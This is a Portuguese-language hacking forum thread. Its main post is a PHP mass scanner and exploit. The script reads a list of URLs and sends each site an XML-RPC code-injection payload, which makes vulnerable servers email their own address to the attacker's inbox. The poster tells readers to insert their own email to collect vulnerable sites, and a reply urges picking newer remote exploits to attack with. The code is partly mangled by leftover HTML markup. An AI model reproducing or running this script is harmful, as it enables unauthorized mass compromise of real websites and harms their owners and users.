Title: Pega sites de arquivo e tenta explorar XMLRPC
Post by: branco on 01 de April , 2008, 06:54:20 PM
Post by: branco on 01 de April , 2008, 06:54:20 PM
Code (php) Select
<?php
</span><span class="syntaxcomment">//by branco - Ictu Oculi
</span><span class="syntaxdefault">$handle </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">fopen</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'maquinas.txt'</span><span class="syntaxkeyword">,</span><span class="syntaxstring">'r'</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">$buffer </span><span class="syntaxkeyword">=&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">fread</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$handle</span><span class="syntaxkeyword">, </span><span class="syntaxdefault">8192</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">fclose</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$handle</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">preg_match_all</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^">) ]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$buffer</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">print_r</span><span class="syntaxkeyword">(</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">);
</span><span class="syntaxdefault">$matches2 </span><span class="syntaxkeyword">= array();
</span><span class="syntaxdefault">$vuls </span><span class="syntaxkeyword">= array();
foreach(</span><span class="syntaxdefault">$matches</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">0</span><span class="syntaxkeyword">] as </span><span class="syntaxdefault">$key </span><span class="syntaxkeyword">=> </span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">) {
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">preg_match</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^\/]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$first_step</span><span class="syntaxkeyword">); </span><span class="syntaxcomment"># get content in http://..../
</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$second_step </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">preg_split</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'/http:\/\/[^\/]*/'</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$value</span><span class="syntaxkeyword">); </span><span class="syntaxcomment"># get /.../..../..., the rest of url
</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$site </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">str_replace</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'http://'</span><span class="syntaxkeyword">,</span><span class="syntaxstring">''</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$first_step</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">0</span><span class="syntaxkeyword">]);
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$url </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">$second_step</span><span class="syntaxkeyword">[</span><span class="syntaxdefault">1</span><span class="syntaxkeyword">];
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$port </span><span class="syntaxkeyword">= </span><span class="syntaxdefault">80</span><span class="syntaxkeyword">;
&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; &</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; </span><span class="syntaxdefault">$exploit</span><span class="syntaxkeyword">&</span><span class="syntaxdefault">nbsp</span><span class="syntaxkeyword">; = </span><span class="syntaxstring">"<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$headersMail = 'From: webmaster@example.com';
$exploit .= "mail('seu@hotmail.com','$site$url','vul','$headersMail');exit;/*</name></value></param></params></methodCall>";
$header = "POST /xmlrpc.php HTTP/1.1 \r\n";
$header .= "Host: $site \r\n";
$header .= "Content-Type: text/xml \r\n";
$header .= "Connection: close \r\n";
$header .= "Content-length: " . strlen($exploit) . "\r\n\r\n";
$header .= $exploit;
$sk = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
if(is_resource($sk) == false) {
continue 1;
}
$conn = @socket_connect($sk, $site, $port);
if($conn == false) {
continue 1;
}
socket_write($sk,$header,strlen($header));
socket_close($sk);
}
?>
reparem que devem modificar "seu@hotmail.com" e o nome do arquivo no fopen.
Os sites que estiverem vulneraveis serão enviados para seu e-mail.
Não reparem se tiver algo sem nexo por ai, faz um tempim que codei.
Até
Title: Re: Pega sites de arquivo e tenta explorar XMLRPC
Post by: Wuefez on 01 de April , 2008, 07:58:49 PM
Post by: Wuefez on 01 de April , 2008, 07:58:49 PM
Num é meio velho esse bug pra se fazer scanner não?
Mas se liga... Tem muito bug novo mais poderoso...
http://www.milw0rm.com/remote.php (http://www.milw0rm.com/remote.php)
Escolhe alguma coisa e vai fundo....
Mas aee.. Parabéns pelo seu code
Mas se liga... Tem muito bug novo mais poderoso...
http://www.milw0rm.com/remote.php (http://www.milw0rm.com/remote.php)
Escolhe alguma coisa e vai fundo....
Mas aee.. Parabéns pelo seu code